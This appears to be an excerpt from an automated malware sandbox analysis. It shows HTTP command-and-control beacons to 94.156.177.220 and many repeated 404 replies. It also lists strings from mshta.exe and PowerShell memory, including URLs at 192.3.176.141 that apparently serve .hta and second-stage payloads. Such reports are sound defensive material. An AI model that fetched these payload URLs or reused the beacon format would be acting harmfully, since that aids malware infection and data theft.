HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/
Source: mshta.exe, 00000004.00000003.463900149.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463769480.000000000295E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.487696778.000000000357F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
Source: mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta)-Qo
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...
Source: mshta.exe, 00000004.00000003.463199089.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463213758.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...%252525
Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta/
Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta1
Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta:
Source: mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaC:
Source: mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaG
Source: mshta.exe, 00000004.00000003.463769480.0000000002955000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.488620769.0000000003575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489793798.0000000003575000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htahttp://192.3.176.141/41/c
Source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/simpleth
Source: powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
Source: powershell.exe, 00000005.00000002.519761992.000000001A220000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.499089877.000000001A89E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF89
Source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFp
Source: mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/h
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.520257981.000000001C14B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000005.00000002.511869443.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
